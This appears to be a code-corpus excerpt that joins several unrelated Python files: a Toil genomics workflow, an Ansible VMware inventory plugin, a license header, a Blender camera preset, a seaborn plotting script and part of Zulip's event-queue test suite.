    # Toil workflow options (job store, restart, batch system, ...).
    parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--samples_file', help="Input configuration file for samples")
    parser.add_argument('-c', '--configuration', help="Configuration file for various settings")
    Job.Runner.addToilOptions(parser)
    args = parser.parse_args()
    args.logLevel = "INFO"
    sys.stdout.write("Parsing configuration data\n")
    config = configuration.configure_runtime(args.configuration)
    sys.stdout.write("Parsing sample data\n")
    samples = configuration.configure_samples(args.samples_file, config)
    # Workflow Graph definition. The following workflow definition should create a valid Directed Acyclic Graph (DAG)
    root_job = Job.wrapJobFn(pipeline.spawn_batch_jobs, cores=1)
    # Per sample jobs: region coverage with sambamba, then vcfanno annotation
    # of the snpEff-annotated VCF.  Resource requests come from the config.
    for sample in samples:
        coverage_job = Job.wrapJobFn(sambamba.sambamba_region_coverage, config, sample, samples,
                                     "{}.recalibrated.sorted.bam".format(sample),
                                     cores=int(config['gatk']['num_cores']),
                                     memory="{}G".format(config['gatk']['max_mem']))
        vcfanno_job = Job.wrapJobFn(annotation.vcfanno, config, sample, samples,
                                    "{}.snpEff.{}.vcf".format(sample, config['snpeff']['reference']),
                                    cores=int(config['vcfanno']['num_cores']),
                                    memory="{}G".format(config['vcfanno']['max_mem']))
        # Create workflow from created jobs: coverage runs first, then
        # annotation, independently for each sample under the shared root.
        root_job.addChild(coverage_job)
        coverage_job.addChild(vcfanno_job)
    # Start workflow execution
    Job.Runner.startToil(root_job, args)
| dgaston/ddb-ngsflow-scripts | workflow-merkel_coverage_annotation.py | Python | mit | 1,997 |
#
# Copyright: (c) 2018, Ansible Project
# Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
name: vmware_vm_inventory
plugin_type: inventory
short_description: VMware Guest inventory source
version_added: "2.7"
author:
- Abhijeet Kasurde (@Akasurde)
description:
- Get virtual machines as inventory hosts from VMware environment.
- Uses any file which ends with vmware.yml or vmware.yaml as a YAML configuration file.
- The inventory_hostname is always the 'Name' and UUID of the virtual machine. UUID is added as VMware allows virtual machines with the same name.
extends_documentation_fragment:
- inventory_cache
requirements:
- "Python >= 2.7"
- "PyVmomi"
- "requests >= 2.3"
- "vSphere Automation SDK - For tag feature"
- "vCloud Suite SDK - For tag feature"
options:
hostname:
description: Name of vCenter or ESXi server.
required: True
env:
- name: VMWARE_SERVER
username:
description: Name of vSphere admin user.
required: True
env:
- name: VMWARE_USERNAME
password:
description: Password of vSphere admin user.
required: True
env:
- name: VMWARE_PASSWORD
port:
description: Port number used to connect to vCenter or ESXi Server.
default: 443
env:
- name: VMWARE_PORT
validate_certs:
description:
- Allows connection when SSL certificates are not valid. Set to C(false) when certificates are not trusted.
default: True
type: boolean
with_tags:
description:
- Include tags and associated virtual machines.
- Requires 'vSphere Automation SDK' and 'vCloud Suite SDK' libraries to be installed on the given controller machine.
- Please refer following URLs for installation steps
- 'https://code.vmware.com/web/sdk/65/vsphere-automation-python'
- 'https://code.vmware.com/web/sdk/60/vcloudsuite-python'
default: False
type: boolean
'''
EXAMPLES = '''
# Sample configuration file for VMware Guest dynamic inventory
plugin: vmware_vm_inventory
strict: False
hostname: 10.65.223.31
username: administrator@vsphere.local
password: Esxi@123$%
validate_certs: False
with_tags: True
'''
import ssl
import atexit
from ansible.errors import AnsibleError, AnsibleParserError
try:
# requests is required for exception handling of the ConnectionError
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
try:
from pyVim import connect
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
try:
from vmware.vapi.lib.connect import get_requests_connector
from vmware.vapi.security.session import create_session_security_context
from vmware.vapi.security.user_password import create_user_password_security_context
from com.vmware.cis_client import Session
from com.vmware.vapi.std_client import DynamicID
from com.vmware.cis.tagging_client import Tag, TagAssociation
HAS_VCLOUD = True
except ImportError:
HAS_VCLOUD = False
try:
from vmware.vapi.stdlib.client.factories import StubConfigurationFactory
HAS_VSPHERE = True
except ImportError:
HAS_VSPHERE = False
from ansible.plugins.inventory import BaseInventoryPlugin, Cacheable
class BaseVMwareInventory:
    """Connection and lookup helpers shared by the VMware inventory plugin.

    Manages two sessions: a SOAP login via pyVmomi (always) and a REST/vAPI
    login (only when tag support is requested).
    """
    def __init__(self, hostname, username, password, port, validate_certs, with_tags):
        self.hostname = hostname
        self.username = username
        self.password = password
        self.port = port
        self.with_tags = with_tags
        self.validate_certs = validate_certs
        self.content = None  # pyVmomi ServiceContent, populated by do_login()
        self.rest_content = None  # vAPI stub configuration, populated only when with_tags
    def do_login(self):
        """
        Verify library/credential requirements are met, then log in.
        """
        self.check_requirements()
        self.content = self._login()
        if self.with_tags:
            # The tagging API is only reachable through the REST (vAPI) endpoint.
            self.rest_content = self._login_vapi()
    def _login_vapi(self):
        """
        Login to vCenter API using REST call
        Returns: stub configuration carrying an authenticated session
        """
        session = requests.Session()
        session.verify = self.validate_certs
        if not self.validate_certs:
            # Disable warning shown at stdout
            requests.packages.urllib3.disable_warnings()
        vcenter_url = "https://%s/api" % self.hostname
        # Get request connector
        connector = get_requests_connector(session=session, url=vcenter_url)
        # Create standard Configuration
        stub_config = StubConfigurationFactory.new_std_configuration(connector)
        # Use username and password in the security context to authenticate
        security_context = create_user_password_security_context(self.username, self.password)
        # Login
        stub_config.connector.set_security_context(security_context)
        # Create the stub for the session service and login by creating a session.
        session_svc = Session(stub_config)
        session_id = session_svc.create()
        # After successful authentication, store the session identifier in the security
        # context of the stub and use that for all subsequent remote requests
        session_security_context = create_session_security_context(session_id)
        stub_config.connector.set_security_context(session_security_context)
        # NOTE(review): stub_config cannot be None at this point (it was already
        # used above), so this guard is effectively dead code.
        if stub_config is None:
            raise AnsibleError("Failed to login to %s using %s" % (self.hostname, self.username))
        return stub_config
    def _login(self):
        """
        Login to vCenter or ESXi server
        Returns: pyVmomi ServiceContent on success; raises AnsibleParserError otherwise
        """
        if self.validate_certs and not hasattr(ssl, 'SSLContext'):
            raise AnsibleError('pyVim does not support changing verification mode with python < 2.7.9. Either update '
                               'python or set validate_certs to false in configuration YAML file.')
        ssl_context = None
        if not self.validate_certs and hasattr(ssl, 'SSLContext'):
            # Build a context that skips certificate verification.
            ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ssl_context.verify_mode = ssl.CERT_NONE
        service_instance = None
        try:
            service_instance = connect.SmartConnect(host=self.hostname, user=self.username,
                                                    pwd=self.password, sslContext=ssl_context,
                                                    port=self.port)
        except vim.fault.InvalidLogin as e:
            raise AnsibleParserError("Unable to log on to vCenter or ESXi API at %s:%s as %s: %s" % (self.hostname, self.port, self.username, e.msg))
        except vim.fault.NoPermission as e:
            raise AnsibleParserError("User %s does not have required permission"
                                     " to log on to vCenter or ESXi API at %s:%s : %s" % (self.username, self.hostname, self.port, e.msg))
        except (requests.ConnectionError, ssl.SSLError) as e:
            raise AnsibleParserError("Unable to connect to vCenter or ESXi API at %s on TCP/%s: %s" % (self.hostname, self.port, e))
        except vmodl.fault.InvalidRequest as e:
            # Request is malformed
            raise AnsibleParserError("Failed to get a response from server %s:%s as "
                                     "request is malformed: %s" % (self.hostname, self.port, e.msg))
        except Exception as e:
            raise AnsibleParserError("Unknown error while connecting to vCenter or ESXi API at %s:%s : %s" % (self.hostname, self.port, e))
        if service_instance is None:
            raise AnsibleParserError("Unknown error while connecting to vCenter or ESXi API at %s:%s" % (self.hostname, self.port))
        # Ensure the session is torn down when the interpreter exits.
        atexit.register(connect.Disconnect, service_instance)
        return service_instance.RetrieveContent()
    def check_requirements(self):
        """ Check all requirements for this inventory are satisfied"""
        if not HAS_REQUESTS:
            raise AnsibleParserError('Please install "requests" Python module as this is required'
                                     ' for VMware Guest dynamic inventory plugin.')
        elif not HAS_PYVMOMI:
            raise AnsibleParserError('Please install "PyVmomi" Python module as this is required'
                                     ' for VMware Guest dynamic inventory plugin.')
        if HAS_REQUESTS:
            # Pyvmomi 5.5 and onwards requires requests 2.3
            # https://github.com/vmware/pyvmomi/blob/master/requirements.txt
            required_version = (2, 3)
            requests_version = requests.__version__.split(".")[:2]
            try:
                requests_major_minor = tuple(map(int, requests_version))
            except ValueError:
                raise AnsibleParserError("Failed to parse 'requests' library version.")
            if requests_major_minor < required_version:
                raise AnsibleParserError("'requests' library version should"
                                         " be >= %s, found: %s." % (".".join([str(w) for w in required_version]),
                                                                    requests.__version__))
        if not HAS_VSPHERE and self.with_tags:
            raise AnsibleError("Unable to find 'vSphere Automation SDK' Python library which is required."
                               " Please refer this URL for installation steps"
                               " - https://code.vmware.com/web/sdk/65/vsphere-automation-python")
        if not HAS_VCLOUD and self.with_tags:
            raise AnsibleError("Unable to find 'vCloud Suite SDK' Python library which is required."
                               " Please refer this URL for installation steps"
                               " - https://code.vmware.com/web/sdk/60/vcloudsuite-python")
        if not all([self.hostname, self.username, self.password]):
            raise AnsibleError("Missing one of the following : hostname, username, password. Please read "
                               "the documentation for more information.")
    def _get_managed_objects_properties(self, vim_type, properties=None):
        """
        Look up a Managed Object Reference in vCenter / ESXi Environment
        :param vim_type: Type of vim object e.g, for datacenter - vim.Datacenter
        :param properties: List of properties related to vim object e.g. Name
        :return: local content object
        """
        # Get Root Folder
        root_folder = self.content.rootFolder
        if properties is None:
            properties = ['name']
        # Create Container View with default root folder
        mor = self.content.viewManager.CreateContainerView(root_folder, [vim_type], True)
        # Create Traversal spec
        traversal_spec = vmodl.query.PropertyCollector.TraversalSpec(
            name="traversal_spec",
            path='view',
            skip=False,
            type=vim.view.ContainerView
        )
        # Create Property Spec
        property_spec = vmodl.query.PropertyCollector.PropertySpec(
            type=vim_type,  # Type of object to be retrieved
            all=False,
            pathSet=properties
        )
        # Create Object Spec
        object_spec = vmodl.query.PropertyCollector.ObjectSpec(
            obj=mor,
            skip=True,
            selectSet=[traversal_spec]
        )
        # Create Filter Spec
        filter_spec = vmodl.query.PropertyCollector.FilterSpec(
            objectSet=[object_spec],
            propSet=[property_spec],
            reportMissingObjectsInResults=False
        )
        return self.content.propertyCollector.RetrieveContents([filter_spec])
    @staticmethod
    def _get_object_prop(vm, attributes):
        """Safely get a (possibly nested) property or return None"""
        result = vm
        for attribute in attributes:
            try:
                result = getattr(result, attribute)
            except (AttributeError, IndexError):
                return None
        return result
class InventoryModule(BaseInventoryPlugin, Cacheable):
    """Ansible inventory plugin turning VMware virtual machines into hosts,
    grouped by tag, power state and guest id."""
    NAME = 'vmware_vm_inventory'
    def verify_file(self, path):
        """
        Verify plugin configuration file and mark this plugin active
        Args:
            path: Path of configuration YAML file
        Returns: True if everything is correct, else False
        """
        valid = False
        if super(InventoryModule, self).verify_file(path):
            # Only file names ending in vmware.yml / vmware.yaml activate us.
            if path.endswith(('vmware.yaml', 'vmware.yml')):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        """
        Parse the inventory file: connect to VMware, populate hosts/groups,
        and refresh the inventory cache when needed.
        """
        super(InventoryModule, self).parse(inventory, loader, path, cache=cache)
        cache_key = self.get_cache_key(path)
        config_data = self._read_config_data(path)
        # set _options from config data
        self._consume_options(config_data)
        self.pyv = BaseVMwareInventory(
            hostname=self.get_option('hostname'),
            username=self.get_option('username'),
            password=self.get_option('password'),
            port=self.get_option('port'),
            with_tags=self.get_option('with_tags'),
            validate_certs=self.get_option('validate_certs')
        )
        self.pyv.do_login()
        self.pyv.check_requirements()
        source_data = None
        if cache:
            # The caller allows caching; honour the user's 'cache' option too.
            cache = self.get_option('cache')
        update_cache = False
        if cache:
            try:
                source_data = self._cache[cache_key]
            except KeyError:
                # Cache miss: repopulate from the live source below.
                update_cache = True
        using_current_cache = cache and not update_cache
        cacheable_results = self._populate_from_source(source_data, using_current_cache)
        if update_cache:
            self._cache[cache_key] = cacheable_results
    def _populate_from_cache(self, source_data):
        """ Populate inventory from previously cached source data """
        hostvars = source_data.pop('_meta', {}).get('hostvars', {})
        for group in source_data:
            if group == 'all':
                continue
            else:
                self.inventory.add_group(group)
                hosts = source_data[group].get('hosts', [])
                for host in hosts:
                    self._populate_host_vars([host], hostvars.get(host, {}), group)
                self.inventory.add_child('all', group)
    def _populate_from_source(self, source_data, using_current_cache):
        """
        Populate inventory data from direct source (or from cache when
        using_current_cache is set).  Returns a JSON-serializable structure
        suitable for caching.
        """
        if using_current_cache:
            self._populate_from_cache(source_data)
            return source_data
        cacheable_results = {'_meta': {'hostvars': {}}}
        hostvars = {}
        objects = self.pyv._get_managed_objects_properties(vim_type=vim.VirtualMachine,
                                                           properties=['name'])
        if self.pyv.with_tags:
            # Pre-create one inventory group per vCenter tag.
            tag_svc = Tag(self.pyv.rest_content)
            tag_association = TagAssociation(self.pyv.rest_content)
            tags_info = dict()
            tags = tag_svc.list()
            for tag in tags:
                tag_obj = tag_svc.get(tag)
                tags_info[tag_obj.id] = tag_obj.name
                if tag_obj.name not in cacheable_results:
                    cacheable_results[tag_obj.name] = {'hosts': []}
                    self.inventory.add_group(tag_obj.name)
        for vm_obj in objects:
            for vm_obj_property in vm_obj.propSet:
                # VMware does not provide a way to uniquely identify VM by its name
                # i.e. there can be two virtual machines with same name
                # Appending "_" and VMware UUID to make it unique
                current_host = vm_obj_property.val + "_" + vm_obj.obj.config.uuid
                if current_host not in hostvars:
                    hostvars[current_host] = {}
                    self.inventory.add_host(current_host)
                    host_ip = vm_obj.obj.guest.ipAddress
                    if host_ip:
                        self.inventory.set_variable(current_host, 'ansible_host', host_ip)
                    self._populate_host_properties(vm_obj, current_host)
                    # Only gather facts related to tag if vCloud and vSphere is installed.
                    if HAS_VCLOUD and HAS_VSPHERE and self.pyv.with_tags:
                        # Add virtual machine to appropriate tag group
                        vm_mo_id = vm_obj.obj._GetMoId()
                        vm_dynamic_id = DynamicID(type='VirtualMachine', id=vm_mo_id)
                        attached_tags = tag_association.list_attached_tags(vm_dynamic_id)
                        for tag_id in attached_tags:
                            self.inventory.add_child(tags_info[tag_id], current_host)
                            cacheable_results[tags_info[tag_id]]['hosts'].append(current_host)
                    # Based on power state of virtual machine
                    vm_power = str(vm_obj.obj.summary.runtime.powerState)
                    if vm_power not in cacheable_results:
                        cacheable_results[vm_power] = {'hosts': []}
                        self.inventory.add_group(vm_power)
                    cacheable_results[vm_power]['hosts'].append(current_host)
                    self.inventory.add_child(vm_power, current_host)
                    # Based on guest id
                    vm_guest_id = vm_obj.obj.config.guestId
                    if vm_guest_id and vm_guest_id not in cacheable_results:
                        cacheable_results[vm_guest_id] = {'hosts': []}
                        self.inventory.add_group(vm_guest_id)
                    # NOTE(review): if vm_guest_id is falsy (unset guestId) the
                    # append below raises KeyError - confirm guestId is always set.
                    cacheable_results[vm_guest_id]['hosts'].append(current_host)
                    self.inventory.add_child(vm_guest_id, current_host)
        for host in hostvars:
            h = self.inventory.get_host(host)
            cacheable_results['_meta']['hostvars'][h.name] = h.vars
        return cacheable_results
    def _populate_host_properties(self, vm_obj, current_host):
        # Load VM properties in host_vars
        vm_properties = [
            'name',
            'config.cpuHotAddEnabled',
            'config.cpuHotRemoveEnabled',
            'config.instanceUuid',
            'config.hardware.numCPU',
            'config.template',
            'config.name',
            'guest.hostName',
            'guest.ipAddress',
            'guest.guestId',
            'guest.guestState',
            'runtime.maxMemoryUsage',
            'customValue',
        ]
        field_mgr = self.pyv.content.customFieldsManager.field
        for vm_prop in vm_properties:
            if vm_prop == 'customValue':
                # Custom fields: resolve the field key to its display name.
                for cust_value in vm_obj.obj.customValue:
                    self.inventory.set_variable(current_host,
                                                [y.name for y in field_mgr if y.key == cust_value.key][0],
                                                cust_value.value)
            else:
                vm_value = self.pyv._get_object_prop(vm_obj.obj, vm_prop.split("."))
                self.inventory.set_variable(current_host, vm_prop, vm_value)
| helldorado/ansible | lib/ansible/plugins/inventory/vmware_vm_inventory.py | Python | gpl-3.0 | 19,672 |
# -*- coding: utf-8 -*-
"""Assessment Open Service Interface Definitions
assessment version 3.0.0
Copyright (c) 2002-2004 Massachusetts Institute of Technology.
Copyright (c) 2008-2010 Ingenescus. All Rights Reserved.
This Work is being provided by the copyright holder(s) subject to the
following license. By obtaining, using and/or copying this Work, you
agree that you have read, understand, and will comply with the following
terms and conditions.
Permission to use, copy and distribute unmodified versions of this Work,
for any purpose, without fee or royalty is hereby granted, provided that
you include the above copyright notices and the terms of this license on
ALL copies of the Work or portions thereof.
You may modify or create Derivatives of this Work only for your internal
purposes. You shall not distribute or transfer any such Derivative of
this Work to any location or to any third party. For the purposes of
this license, "Derivative" shall mean any derivative of the Work as
defined in the United States Copyright Act of 1976, such as a
translation or modification.
This Work and the information contained herein is provided on an "AS IS"
basis WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS IN THE WORK.
The export of software employing encryption technology may require a
specific license from the United States Government. It is the
responsibility of any person or organization contemplating export to
obtain such a license before exporting this Work.
"""
| birdland/dlkit-doc | dlkit/assessment/license.py | Python | mit | 1,842 |
import bpy

# Motion-tracking camera preset: Blackmagic Cinema Camera.
camera = bpy.context.edit_movieclip.tracking.camera
camera.sensor_width = 15.81  # sensor width, in the units declared below
camera.units = 'MILLIMETERS'
camera.pixel_aspect = 1
# No lens distortion: zero out the polynomial distortion coefficients.
camera.k1 = 0.0
camera.k2 = 0.0
camera.k3 = 0.0
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 26 16:43:46 2017

@author: DWyatt

Draw one strip plot of SalePrice against every other column of train.csv
and save each chart as a PNG in the ./charts directory.
"""
import os

import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt

df_train = pd.read_csv('train.csv')
target = 'SalePrice'
# Every column except the target becomes the x-axis of one chart.
variables = [str(column) for column in df_train.columns if column != target]

# Build the output path portably (the old code hard-coded Windows '\\' separators).
chart_dir = os.path.join(os.getcwd(), 'charts')
for variable in variables:
    plt.figure()
    sns_scatter = sns.stripplot(x=variable, y=target, data=df_train)
    fig = sns_scatter.get_figure()
    fig.savefig(os.path.join(chart_dir, variable + '.png'))
    # Close each figure once saved; otherwise matplotlib keeps every figure
    # open and accumulates memory across the loop.
    plt.close(fig)
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from typing import Any, Callable, Optional
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from django.test import TestCase
from zerver.models import (
get_client, get_realm_by_string_id, get_stream, get_user_profile_by_email,
Message, Recipient, UserProfile
)
from zerver.lib.actions import (
apply_events,
bulk_remove_subscriptions,
do_add_alert_words,
check_add_realm_emoji,
do_add_realm_filter,
do_change_avatar_source,
do_change_default_all_public_streams,
do_change_default_events_register_stream,
do_change_default_sending_stream,
do_change_full_name,
do_change_is_admin,
do_change_stream_description,
do_change_subscription_property,
do_create_user,
do_deactivate_stream,
do_deactivate_user,
do_regenerate_api_key,
do_remove_alert_words,
do_remove_realm_emoji,
do_remove_realm_filter,
do_rename_stream,
do_add_default_stream,
do_set_muted_topics,
do_set_realm_create_stream_by_admins_only,
do_set_realm_name,
do_set_realm_restricted_to_domain,
do_set_realm_invite_required,
do_set_realm_invite_by_admins_only,
do_set_realm_message_editing,
do_set_realm_default_language,
do_set_realm_authentication_methods,
do_update_message,
do_update_pointer,
do_change_twenty_four_hour_time,
do_change_left_side_userlist,
fetch_initial_state_data,
get_subscription
)
from zerver.lib.message import render_markdown
from zerver.lib.test_helpers import POSTRequestMock
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.validator import (
check_bool, check_dict, check_int, check_list, check_string,
equals, check_none_or, Validator
)
from zerver.views.events_register import _default_all_public_streams, _default_narrow
from zerver.tornado.event_queue import allocate_client_descriptor, EventQueue
from zerver.tornado.views import get_events_backend
from collections import OrderedDict
import mock
import time
import ujson
from six.moves import range
class TornadoTest(ZulipTestCase):
    """Smoke tests for the internal /notify_tornado endpoint."""
    def test_tornado_endpoint(self):
        # type: () -> None
        # This test is mostly intended to get minimal coverage on
        # the /notify_tornado endpoint, so we can have 100% URL coverage,
        # but it does exercise a little bit of the codepath.
        post_data = dict(
            data=ujson.dumps(
                dict(
                    event=dict(
                        type='other'
                    ),
                    users=[get_user_profile_by_email('hamlet@zulip.com').id],
                ),
            ),
        )
        # Without the shared secret the request must be rejected.
        req = POSTRequestMock(post_data, user_profile=None)
        req.META['REMOTE_ADDR'] = '127.0.0.1'
        result = self.client_post_request('/notify_tornado', req)
        self.assert_json_error(result, 'Access denied', status_code=403)
        # With the shared secret attached, the same request succeeds.
        post_data['secret'] = settings.SHARED_SECRET
        req = POSTRequestMock(post_data, user_profile=None)
        req.META['REMOTE_ADDR'] = '127.0.0.1'
        result = self.client_post_request('/notify_tornado', req)
        self.assert_json_success(result)
class GetEventsTest(ZulipTestCase):
    """End-to-end tests for the long-polling /events endpoint (Tornado)."""
    def tornado_call(self, view_func, user_profile, post_data):
        # type: (Callable[[HttpRequest, UserProfile], HttpResponse], UserProfile, Dict[str, Any]) -> HttpResponse
        # Invoke a Tornado view function directly with a mocked POST request,
        # bypassing the HTTP stack.
        request = POSTRequestMock(post_data, user_profile)
        return view_func(request, user_profile)
    def test_get_events(self):
        # type: () -> None
        email = "hamlet@zulip.com"
        recipient_email = "othello@zulip.com"
        user_profile = get_user_profile_by_email(email)
        recipient_user_profile = get_user_profile_by_email(recipient_email)
        self.login(email)
        # Register one message-only event queue for the sender...
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"apply_markdown": ujson.dumps(True),
                                    "event_types": ujson.dumps(["message"]),
                                    "user_client": "website",
                                    "dont_block": ujson.dumps(True),
                                    })
        self.assert_json_success(result)
        queue_id = ujson.loads(result.content)["queue_id"]
        # ...and one for the recipient.
        recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
                                             {"apply_markdown": ujson.dumps(True),
                                              "event_types": ujson.dumps(["message"]),
                                              "user_client": "website",
                                              "dont_block": ujson.dumps(True),
                                              })
        self.assert_json_success(recipient_result)
        recipient_queue_id = ujson.loads(recipient_result.content)["queue_id"]
        # A freshly registered queue starts out empty.
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 0)
        # Sending from the queue's owner delivers one event back to the
        # sender, which echoes the sender-supplied local id.
        local_id = 10.01
        self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 1)
        self.assertEqual(events[0]["type"], "message")
        self.assertEqual(events[0]["message"]["sender_email"], email)
        self.assertEqual(events[0]["local_message_id"], local_id)
        self.assertEqual(events[0]["message"]["display_recipient"][0]["is_mirror_dummy"], False)
        self.assertEqual(events[0]["message"]["display_recipient"][1]["is_mirror_dummy"], False)
        # Polling with last_event_id acknowledges earlier events; only the
        # newer message comes back.
        last_event_id = events[0]["id"]
        local_id += 0.01
        self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": last_event_id,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 1)
        self.assertEqual(events[0]["type"], "message")
        self.assertEqual(events[0]["message"]["sender_email"], email)
        self.assertEqual(events[0]["local_message_id"], local_id)
        # Test that the received message in the receiver's event queue
        # exists and does not contain a local id
        recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
                                             {"queue_id": recipient_queue_id,
                                              "user_client": "website",
                                              "last_event_id": -1,
                                              "dont_block": ujson.dumps(True),
                                              })
        recipient_events = ujson.loads(recipient_result.content)["events"]
        self.assert_json_success(recipient_result)
        self.assertEqual(len(recipient_events), 2)
        self.assertEqual(recipient_events[0]["type"], "message")
        self.assertEqual(recipient_events[0]["message"]["sender_email"], email)
        self.assertTrue("local_message_id" not in recipient_events[0])
        self.assertEqual(recipient_events[1]["type"], "message")
        self.assertEqual(recipient_events[1]["message"]["sender_email"], email)
        self.assertTrue("local_message_id" not in recipient_events[1])
    def test_get_events_narrow(self):
        # type: () -> None
        email = "hamlet@zulip.com"
        user_profile = get_user_profile_by_email(email)
        self.login(email)
        # Register a queue narrowed to the "denmark" stream.
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"apply_markdown": ujson.dumps(True),
                                    "event_types": ujson.dumps(["message"]),
                                    "narrow": ujson.dumps([["stream", "denmark"]]),
                                    "user_client": "website",
                                    "dont_block": ujson.dumps(True),
                                    })
        self.assert_json_success(result)
        queue_id = ujson.loads(result.content)["queue_id"]
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 0)
        # The personal message is filtered out by the narrow; only the
        # stream message should be delivered.
        self.send_message(email, "othello@zulip.com", Recipient.PERSONAL, "hello")
        self.send_message(email, "Denmark", Recipient.STREAM, "hello")
        result = self.tornado_call(get_events_backend, user_profile,
                                   {"queue_id": queue_id,
                                    "user_client": "website",
                                    "last_event_id": -1,
                                    "dont_block": ujson.dumps(True),
                                    })
        events = ujson.loads(result.content)["events"]
        self.assert_json_success(result)
        self.assert_length(events, 1)
        self.assertEqual(events[0]["type"], "message")
        self.assertEqual(events[0]["message"]["display_recipient"], "Denmark")
class EventsRegisterTest(ZulipTestCase):
    """For each server-side action under test, check two things:

    * the action emits events matching the expected schema, and
    * replaying those events via apply_events() on top of a pre-action
      fetch_initial_state_data() snapshot yields the same state as a
      fresh fetch after the action (see do_test()).

    Fix included: test_realm_filter_events previously discarded the events
    from the remove action and re-validated the stale "add" event.
    """

    # Evaluated once at class-definition time, against the test fixtures.
    user_profile = get_user_profile_by_email("hamlet@zulip.com")
    bot = get_user_profile_by_email("welcome-bot@zulip.com")
    maxDiff = None  # type: Optional[int]

    def create_bot(self, email):
        # type: (str) -> UserProfile
        """Create a default bot owned by self.user_profile."""
        return do_create_user(email, '123',
                              get_realm_by_string_id('zulip'), 'Test Bot', 'test',
                              bot_type=UserProfile.DEFAULT_BOT, bot_owner=self.user_profile)

    def realm_bot_schema(self, field_name, check):
        # type: (str, Validator) -> Validator
        """Validator for a realm_bot/update event touching one field."""
        return check_dict([
            ('type', equals('realm_bot')),
            ('op', equals('update')),
            ('bot', check_dict([
                ('email', check_string),
                ('user_id', check_int),
                (field_name, check),
            ])),
        ])

    def do_test(self, action, event_types=None):
        # type: (Callable[[], Any], Optional[List[str]]) -> List[Dict[str, Any]]
        """Run action() and verify event/state consistency.

        Returns the events generated by the action so callers can run
        schema checks on them.
        """
        client = allocate_client_descriptor(
            dict(user_profile_id=self.user_profile.id,
                 user_profile_email=self.user_profile.email,
                 realm_id=self.user_profile.realm.id,
                 event_types=event_types,
                 client_type_name="website",
                 apply_markdown=True,
                 all_public_streams=False,
                 queue_timeout=600,
                 last_connection_time=time.time(),
                 narrow=[])
        )
        # hybrid_state = initial fetch state + re-applying events triggered by our action
        # normal_state = do action then fetch at the end (the "normal" code path)
        hybrid_state = fetch_initial_state_data(self.user_profile, event_types, "")
        action()
        events = client.event_queue.contents()
        self.assertTrue(len(events) > 0)
        apply_events(hybrid_state, events, self.user_profile)
        normal_state = fetch_initial_state_data(self.user_profile, event_types, "")
        self.match_states(hybrid_state, normal_state)
        return events

    def assert_on_error(self, error):
        # type: (str) -> None
        """Turn a non-empty validator error message into a test failure."""
        if error:
            raise AssertionError(error)

    def match_states(self, state1, state2):
        # type: (Dict[str, Any], Dict[str, Any]) -> None
        """Assert two state dicts are equal, after re-keying the
        list-of-dicts fields so that ordering differences don't matter."""
        def normalize(state):
            # type: (Dict[str, Any]) -> None
            state['realm_users'] = {u['email']: u for u in state['realm_users']}
            for u in state['subscriptions']:
                u['subscribers'].sort()
            state['subscriptions'] = {u['name']: u for u in state['subscriptions']}
            state['unsubscribed'] = {u['name']: u for u in state['unsubscribed']}
            if 'realm_bots' in state:
                state['realm_bots'] = {u['email']: u for u in state['realm_bots']}
        normalize(state1)
        normalize(state2)
        self.assertEqual(state1, state2)

    def test_send_message_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('message')),
            ('flags', check_list(None)),
            ('message', check_dict([
                ('avatar_url', check_string),
                ('client', check_string),
                ('content', check_string),
                ('content_type', equals('text/html')),
                ('display_recipient', check_string),
                ('gravatar_hash', check_string),
                ('id', check_int),
                ('recipient_id', check_int),
                ('sender_domain', check_string),
                ('sender_email', check_string),
                ('sender_full_name', check_string),
                ('sender_id', check_int),
                ('sender_short_name', check_string),
                ('subject', check_string),
                ('subject_links', check_list(None)),
                ('timestamp', check_int),
                ('type', check_string),
            ])),
        ])
